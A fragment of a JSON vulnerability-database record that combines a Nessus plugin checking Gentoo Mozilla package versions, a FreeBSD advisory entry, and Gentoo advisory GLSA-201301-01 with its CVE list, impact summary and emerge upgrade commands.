script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-772\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n script_cwe_id(16, 20, 22, 59, 79, 94, 119, 189, 200, 264, 287, 310, 362, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:firefox-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:icecat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mozilla-firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mozilla-firefox-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mozilla-thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mozilla-thunderbird-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:seamonkey\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:seamonkey-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:thunderbird-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:xulrunner-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/08\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-libs/xulrunner-bin\", unaffected:make_list(), vulnerable:make_list(\"le 1.8.1.19\"))) flag++;\nif (qpkg_check(package:\"mail-client/thunderbird-bin\", unaffected:make_list(\"ge 10.0.11\"), vulnerable:make_list(\"lt 10.0.11\"))) flag++;\nif (qpkg_check(package:\"www-client/firefox\", unaffected:make_list(\"ge 10.0.11\"), vulnerable:make_list(\"lt 10.0.11\"))) flag++;\nif (qpkg_check(package:\"mail-client/thunderbird\", unaffected:make_list(\"ge 10.0.11\"), vulnerable:make_list(\"lt 10.0.11\"))) flag++;\nif (qpkg_check(package:\"mail-client/mozilla-thunderbird-bin\", unaffected:make_list(), vulnerable:make_list(\"le 3.0\"))) flag++;\nif (qpkg_check(package:\"mail-client/mozilla-thunderbird\", unaffected:make_list(), vulnerable:make_list(\"le 3.0.4-r1\"))) flag++;\nif (qpkg_check(package:\"dev-libs/nss\", unaffected:make_list(\"ge 3.14\"), vulnerable:make_list(\"lt 3.14\"))) flag++;\nif (qpkg_check(package:\"www-client/firefox-bin\", unaffected:make_list(\"ge 10.0.11\"), vulnerable:make_list(\"lt 10.0.11\"))) flag++;\nif (qpkg_check(package:\"net-libs/xulrunner\", unaffected:make_list(), vulnerable:make_list(\"le 2.0-r1\"))) flag++;\nif (qpkg_check(package:\"www-client/mozilla-firefox-bin\", unaffected:make_list(), vulnerable:make_list(\"le 3.5.6\"))) flag++;\nif (qpkg_check(package:\"www-client/seamonkey\", unaffected:make_list(\"ge 2.14-r1\"), vulnerable:make_list(\"lt 2.14-r1\"))) flag++;\nif (qpkg_check(package:\"www-client/icecat\", unaffected:make_list(), vulnerable:make_list(\"le 10.0-r1\"))) flag++;\nif (qpkg_check(package:\"www-client/seamonkey-bin\", unaffected:make_list(\"ge 2.14\"), vulnerable:make_list(\"lt 2.14\"))) flag++;\nif (qpkg_check(package:\"www-client/mozilla-firefox\", unaffected:make_list(), vulnerable:make_list(\"le 3.6.8\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Mozilla Products\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:08", "bulletinFamily": "unix", "cvelist": ["CVE-2010-1028"], "description": "\nMozilla Project reports:\n\nMFSA 2010-08 WOFF heap corruption due to integer overflow\n\n", "edition": 4, "modified": "2010-03-22T00:00:00", "published": "2010-03-22T00:00:00", "id": "5D5ED535-3653-11DF-9EDC-000F20797EDE", "href": "https://vuxml.freebsd.org/freebsd/5d5ed535-3653-11df-9edc-000f20797ede.html", "title": "firefox -- WOFF heap corruption due to integer overflow", "type": "freebsd", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:13", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1945", "CVE-2011-3648", "CVE-2009-0355", "CVE-2011-0061", "CVE-2011-0077", "CVE-2012-0478", "CVE-2012-4193", "CVE-2011-1202", "CVE-2012-0442", "CVE-2010-3772", "CVE-2011-0071", "CVE-2009-2470", "CVE-2010-0654", "CVE-2009-3388", "CVE-2012-1962", "CVE-2012-0443", "CVE-2011-3866", "CVE-2011-0068", "CVE-2012-5842", "CVE-2012-4212", "CVE-2009-2477", "CVE-2009-1563", "CVE-2010-0176", "CVE-2011-3640", "CVE-2011-0083", "CVE-2010-1203", "CVE-2009-3076", "CVE-2012-1970", "CVE-2009-3389", "CVE-2008-3835", "CVE-2012-3989", "CVE-2010-2762", "CVE-2012-5830", "CVE-2012-4210", "CVE-2009-1305", "CVE-2011-3026", "CVE-2009-3979", "CVE-2011-2370", "CVE-2012-0460", "CVE-2012-1973", "CVE-2009-3376", "CVE-2011-2369", "CVE-2011-2998", "CVE-2011-3654", "CVE-2011-2605", "CVE-2009-1833", "CVE-2010-0165", "CVE-2012-1974", "CVE-2010-0220", "CVE-2010-2766", "CVE-2011-2993", "CVE-2012-4195", "CVE-2010-0168", "CVE-2012-3986", "CVE-2010-0160", "CVE-2009-1169", "CVE-2011-2371", "CVE-2009-3379", "CVE-2012-4185", "CVE-2010-3777", "CVE-2012-3991", "CVE-2012-5354", "CVE-2012-4206", "CVE-2009-3071", "CVE-2012-3968", "CVE-2010-1214", "CVE-2012-3963", "CVE-2010-0174", "CVE-2010-0172", "CVE-2009-2535", "CVE-2012-0452", "CVE-2009-1312", "CVE-2012-1956", "CVE-2012-3978", "CVE-2012-3985", "CVE-2011-2995", "CVE-2012-5829", "CVE-2009-1571", "CVE-2008-5505", "CVE-2012-5838", "CVE-2011-2986", "CVE-2010-1205", "CVE-2009-2210", "CVE-2009-2478", "CVE-2008-6961", "CVE-2012-0479", "CVE-2012-0450", "CVE-2012-1940", "CVE-2012-3993", "CVE-2008-5500", "CVE-2012-5836", "CVE-2009-3274", "CVE-2010-1125", "CVE-2009-0772", "CVE-2012-3995", "CVE-2012-4201", "CVE-2010-0159", "CVE-2009-0773", "CVE-2011-3659", "CVE-2011-3663", "CVE-2010-3131", "CVE-2012-0470", "CVE-2012-0446", "CVE-2008-4063", "CVE-2012-3976", "CVE-2012-1972", "CVE-2010-1200", "CVE-2010-0175", "CVE-2010-0170", "CVE-2012-3988", "CVE-2012-0457", "CVE-2010-3778", "CVE-2012-3994", "CVE-2007-2436", "CVE-2012-3962", "CVE-2010-2770", "CVE-2010-3774", "CVE-2012-0459", "CVE-2011-2362", "CVE-2009-1304", "CVE-2010-1213", "CVE-2010-3177", "CVE-2012-5843", "CVE-2009-1835", "CVE-2011-0085", "CVE-2009-0352", "CVE-2009-3984", "CVE-2009-3380", "CVE-2008-5510", "CVE-2011-0080", "CVE-2012-1950", "CVE-2008-5502", "CVE-2009-3981", "CVE-2010-3765", "CVE-2010-0167", "CVE-2009-3373", "CVE-2009-3980", "CVE-2008-4070", "CVE-2012-4183", "CVE-2010-3178", "CVE-2012-1994", "CVE-2011-3661", "CVE-2009-3383", "CVE-2012-4181", "CVE-2011-3652", "CVE-2009-1311", "CVE-2011-1712", "CVE-2008-4067", "CVE-2010-1210", "CVE-2011-2364", "CVE-2009-2469", "CVE-2011-0073", "CVE-2010-1197", "CVE-2010-1207", "CVE-2009-0652", "CVE-2012-4186", "CVE-2012-1948", "CVE-2008-5012", "CVE-2011-2982", "CVE-2012-1938", "CVE-2012-0449", "CVE-2010-3769", "CVE-2012-3969", "CVE-2009-1838", "CVE-2012-1953", "CVE-2008-5013", "CVE-2012-1949", "CVE-2012-0456", "CVE-2011-2372", "CVE-2010-3773", "CVE-2009-1309", "CVE-2011-0079", "CVE-2010-3169", "CVE-2009-2662", "CVE-2012-3970", "CVE-2011-2997", "CVE-2011-0053", "CVE-2009-1832", "CVE-2012-5840", "CVE-2010-3176", "CVE-2012-4191", "CVE-2010-3174", "CVE-2012-1966", "CVE-2010-3768", "CVE-2009-3372", "CVE-2010-2763", "CVE-2011-0066", "CVE-2010-1212", "CVE-2009-1837", "CVE-2010-1206", "CVE-2010-1211", "CVE-2009-2464", "CVE-2011-2990", "CVE-2010-1121", "CVE-2009-0356", "CVE-2011-3389", "CVE-2010-0164", "CVE-2008-3836", "CVE-2010-3167", "CVE-2012-4202", "CVE-2007-2671", "CVE-2011-2984", "CVE-2010-3180", "CVE-2012-3957", "CVE-2011-3660", "CVE-2009-3986", "CVE-2012-1941", "CVE-2009-2408", "CVE-2010-3399", "CVE-2009-2665", "CVE-2008-4066", "CVE-2008-5018", "CVE-2009-3978", "CVE-2012-3984", "CVE-2009-0354", "CVE-2009-3079", "CVE-2011-0056", "CVE-2012-0444", "CVE-2011-3650", "CVE-2010-2753", "CVE-2012-1946", "CVE-2010-3776", "CVE-2010-1215", "CVE-2012-4182", "CVE-2011-2980", "CVE-2012-4187", "CVE-2008-4069", "CVE-2010-0166", "CVE-2011-3647", "CVE-2011-0065", "CVE-2011-0062", "CVE-2008-0016", "CVE-2009-0358", "CVE-2011-3101", "CVE-2010-3168", "CVE-2010-0173", "CVE-2009-1044", "CVE-2008-5513", "CVE-2008-4059", "CVE-2010-2764", "CVE-2011-0081", "CVE-2009-0771", "CVE-2009-1392", "CVE-2008-5504", "CVE-2008-5019", "CVE-2012-1954", "CVE-2009-0774", "CVE-2009-3375", "CVE-2012-0461", "CVE-2011-2376", "CVE-2009-2472", "CVE-2012-3958", "CVE-2009-0071", "CVE-2008-5023", "CVE-2012-0469", "CVE-2010-3171", "CVE-2009-3072", "CVE-2012-3973", "CVE-2008-5822", "CVE-2012-1975", "CVE-2011-0075", "CVE-2012-0464", "CVE-2012-1967", "CVE-2011-3653", "CVE-2010-0648", "CVE-2010-0178", "CVE-2010-3166", "CVE-2010-0177", "CVE-2011-0074", "CVE-2012-3956", "CVE-2010-2769", "CVE-2011-3649", "CVE-2012-3982", "CVE-2009-3555", "CVE-2011-2989", "CVE-2010-1196", "CVE-2008-3837", "CVE-2009-0357", "CVE-2008-5021", "CVE-2008-5017", "CVE-2012-3966", "CVE-2012-5839", "CVE-2011-2378", "CVE-2009-1308", "CVE-2010-3775", "CVE-2009-2467", "CVE-2012-1961", "CVE-2010-5074", "CVE-2011-2996", "CVE-2010-3173", "CVE-2012-4216", "CVE-2008-4062", "CVE-2010-3179", "CVE-2010-0182", "CVE-2012-3967", "CVE-2011-3651", "CVE-2008-4060", "CVE-2010-0181", "CVE-2012-1951", "CVE-2012-0475", "CVE-2012-3965", "CVE-2012-1952", "CVE-2010-1201", "CVE-2011-4688", "CVE-2009-1306", "CVE-2010-1585", "CVE-2009-2479", "CVE-2012-3959", "CVE-2012-0455", "CVE-2009-0777", "CVE-2010-2755", "CVE-2011-0084", "CVE-2011-0051", "CVE-2010-3767", "CVE-2012-1939", "CVE-2009-1834", "CVE-2010-3771", "CVE-2010-0183", "CVE-2012-0474", "CVE-2012-3975", "CVE-2010-2768", "CVE-2008-5014", "CVE-2008-0367", "CVE-2008-4058", "CVE-2011-3002", "CVE-2012-4184", "CVE-2011-0057", "CVE-2012-0447", "CVE-2011-3232", "CVE-2008-5913", "CVE-2007-3073", "CVE-2012-4205", "CVE-2010-2751", "CVE-2009-1836", "CVE-2011-0069", "CVE-2008-5022", "CVE-2008-5512", "CVE-2012-3992", "CVE-2009-3374", "CVE-2008-5501", "CVE-2008-4068", "CVE-2008-5016", "CVE-2011-3004", "CVE-2012-3980", "CVE-2008-5503", "CVE-2011-2374", "CVE-2012-1955", "CVE-2009-1839", "CVE-2012-1960", "CVE-2012-0445", "CVE-2009-3074", "CVE-2012-1965", "CVE-2011-3670", "CVE-2012-0462", "CVE-2010-1028", "CVE-2010-0162", "CVE-2011-2377", "CVE-2009-2463", "CVE-2009-2061", "CVE-2009-3070", "CVE-2012-3977", "CVE-2011-3000", "CVE-2010-2765", "CVE-2009-3069", "CVE-2010-0171", "CVE-2010-2767", "CVE-2009-0353", "CVE-2011-0078", "CVE-2012-3960", "CVE-2010-3175", "CVE-2009-0775", "CVE-2012-0451", "CVE-2011-3655", "CVE-2012-4180", "CVE-2009-2044", "CVE-2010-3182", "CVE-2009-0776", "CVE-2009-3371", "CVE-2009-3377", "CVE-2012-1959", "CVE-2011-2363", "CVE-2009-3075", "CVE-2010-0163", "CVE-2010-1208", "CVE-2011-0070", "CVE-2012-1947", "CVE-2009-1841", "CVE-2010-3170", "CVE-2011-3005", "CVE-2011-0059", "CVE-2012-1971", "CVE-2009-3983", "CVE-2012-4208", "CVE-2009-3987", "CVE-2011-3658", "CVE-2011-2373", "CVE-2008-5511", "CVE-2012-1957", "CVE-2012-1958", "CVE-2011-0054", "CVE-2012-4190", "CVE-2008-4064", "CVE-2012-1976", "CVE-2011-1187", "CVE-2012-5835", "CVE-2010-3183", "CVE-2009-2654", "CVE-2010-1202", "CVE-2012-0468", "CVE-2009-3982", "CVE-2009-3985", "CVE-2009-2065", "CVE-2009-1313", "CVE-2009-3382", "CVE-2008-5508", "CVE-2012-3972", "CVE-2012-4207", "CVE-2011-2988", "CVE-2010-3770", "CVE-2008-4061", "CVE-2010-1199", "CVE-2012-4204", "CVE-2008-0017", "CVE-2009-3988", "CVE-2010-3400", "CVE-2009-1302", "CVE-2011-2985", "CVE-2009-2466", "CVE-2012-4192", "CVE-2011-0058", "CVE-2011-2987", "CVE-2012-4188", "CVE-2012-0441", "CVE-2008-5024", "CVE-2011-0076", "CVE-2007-2437", "CVE-2012-5833", "CVE-2011-2999", "CVE-2012-3964", "CVE-2012-5841", "CVE-2010-0179", "CVE-2010-1209", "CVE-2010-2754", "CVE-2008-5507", "CVE-2009-2471", "CVE-2012-3990", "CVE-2011-2375", "CVE-2010-1198", "CVE-2008-4065", "CVE-2009-1840", "CVE-2011-3665", "CVE-2009-3381", "CVE-2011-0067", "CVE-2010-2760", "CVE-2012-1937", "CVE-2012-4215", "CVE-2009-2043", "CVE-2009-1307", "CVE-2009-2664", "CVE-2012-0463", "CVE-2010-4508", "CVE-2009-1310", "CVE-2009-3077", "CVE-2011-3003", "CVE-2011-2991", "CVE-2008-5015", "CVE-2011-0082", "CVE-2011-2983", "CVE-2012-4179", "CVE-2008-4582", "CVE-2011-3001", "CVE-2012-1964", "CVE-2009-2462", "CVE-2009-3378", "CVE-2011-3062", "CVE-2009-1303", "CVE-2012-0477", "CVE-2012-0473", "CVE-2012-4194", "CVE-2011-2365", "CVE-2012-4209", "CVE-2012-1963", "CVE-2012-4196", "CVE-2008-5506", "CVE-2009-2404", "CVE-2009-2465", "CVE-2012-0467", "CVE-2011-2981", "CVE-2012-0458", "CVE-2010-0169", "CVE-2010-2752", "CVE-2009-3078", "CVE-2012-0471", "CVE-2012-3961", "CVE-2010-3766", "CVE-2012-3971", "CVE-2008-5052", "CVE-2011-0055", "CVE-2009-1828", "CVE-2011-0072"], "description": "### Background\n\nMozilla Firefox is an open-source web browser and Mozilla Thunderbird an open-source email client, both from the Mozilla Project. The SeaMonkey project is a community effort to deliver production-quality releases of code derived from the application formerly known as the \u2018Mozilla Application Suite\u2019. XULRunner is a Mozilla runtime package that can be used to bootstrap XUL+XPCOM applications such as Firefox and Thunderbird. NSS is Mozilla\u2019s Network Security Services library that implements PKI support. IceCat is the GNU version of Firefox. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Mozilla Firefox, Thunderbird, SeaMonkey, NSS, GNU IceCat, and XULRunner. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could entice a user to view a specially crafted web page or email, possibly resulting in execution of arbitrary code or a Denial of Service condition. Furthermore, a remote attacker may be able to perform Man-in-the-Middle attacks, obtain sensitive information, bypass restrictions and protection mechanisms, force file downloads, conduct XML injection attacks, conduct XSS attacks, bypass the Same Origin Policy, spoof URL\u2019s for phishing attacks, trigger a vertical scroll, spoof the location bar, spoof an SSL indicator, modify the browser\u2019s font, conduct clickjacking attacks, or have other unspecified impact. \n\nA local attacker could gain escalated privileges, obtain sensitive information, or replace an arbitrary downloaded file. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Mozilla Firefox users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/firefox-10.0.11\"\n \n\nAll users of the Mozilla Firefox binary package should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/firefox-bin-10.0.11\"\n \n\nAll Mozilla Thunderbird users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-client/thunderbird-10.0.11\"\n \n\nAll users of the Mozilla Thunderbird binary package should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=mail-client/thunderbird-bin-10.0.11\"\n \n\nAll Mozilla SeaMonkey users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/seamonkey-2.14-r1\"\n \n\nAll users of the Mozilla SeaMonkey binary package should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/seamonkey-bin-2.14\"\n \n\nAll NSS users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-libs/nss-3.14\"\n \n\nThe \u201cwww-client/mozilla-firefox\u201d package has been merged into the \u201cwww-client/firefox\u201d package. To upgrade, please unmerge \u201cwww-client/mozilla-firefox\u201d and then emerge the latest \u201cwww-client/firefox\u201d package: \n \n \n # emerge --sync\n # emerge --unmerge \"www-client/mozilla-firefox\"\n # emerge --ask --oneshot --verbose \">=www-client/firefox-10.0.11\"\n \n\nThe \u201cwww-client/mozilla-firefox-bin\u201d package has been merged into the \u201cwww-client/firefox-bin\u201d package. To upgrade, please unmerge \u201cwww-client/mozilla-firefox-bin\u201d and then emerge the latest \u201cwww-client/firefox-bin\u201d package: \n \n \n # emerge --sync\n # emerge --unmerge \"www-client/mozilla-firefox-bin\"\n # emerge --ask --oneshot --verbose \">=www-client/firefox-bin-10.0.11\"\n \n\nThe \u201cmail-client/mozilla-thunderbird\u201d package has been merged into the \u201cmail-client/thunderbird\u201d package. To upgrade, please unmerge \u201cmail-client/mozilla-thunderbird\u201d and then emerge the latest \u201cmail-client/thunderbird\u201d package: \n \n \n # emerge --sync\n # emerge --unmerge \"mail-client/mozilla-thunderbird\"\n # emerge --ask --oneshot --verbose \">=mail-client/thunderbird-10.0.11\"\n \n\nThe \u201cmail-client/mozilla-thunderbird-bin\u201d package has been merged into the \u201cmail-client/thunderbird-bin\u201d package. To upgrade, please unmerge \u201cmail-client/mozilla-thunderbird-bin\u201d and then emerge the latest \u201cmail-client/thunderbird-bin\u201d package: \n \n \n # emerge --sync\n # emerge --unmerge \"mail-client/mozilla-thunderbird-bin\"\n # emerge --ask --oneshot --verbose\n \">=mail-client/thunderbird-bin-10.0.11\"\n \n\nGentoo discontinued support for GNU IceCat. We recommend that users unmerge GNU IceCat: \n \n \n # emerge --unmerge \"www-client/icecat\"\n \n\nGentoo discontinued support for XULRunner. We recommend that users unmerge XULRunner: \n \n \n # emerge --unmerge \"net-libs/xulrunner\"\n \n\nGentoo discontinued support for the XULRunner binary package. We recommend that users unmerge XULRunner: \n \n \n # emerge --unmerge \"net-libs/xulrunner-bin\"", "edition": 1, "modified": "2013-01-08T00:00:00", "published": "2013-01-08T00:00:00", "id": "GLSA-201301-01", "href": "https://security.gentoo.org/glsa/201301-01", "type": "gentoo", "title": "Mozilla Products: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
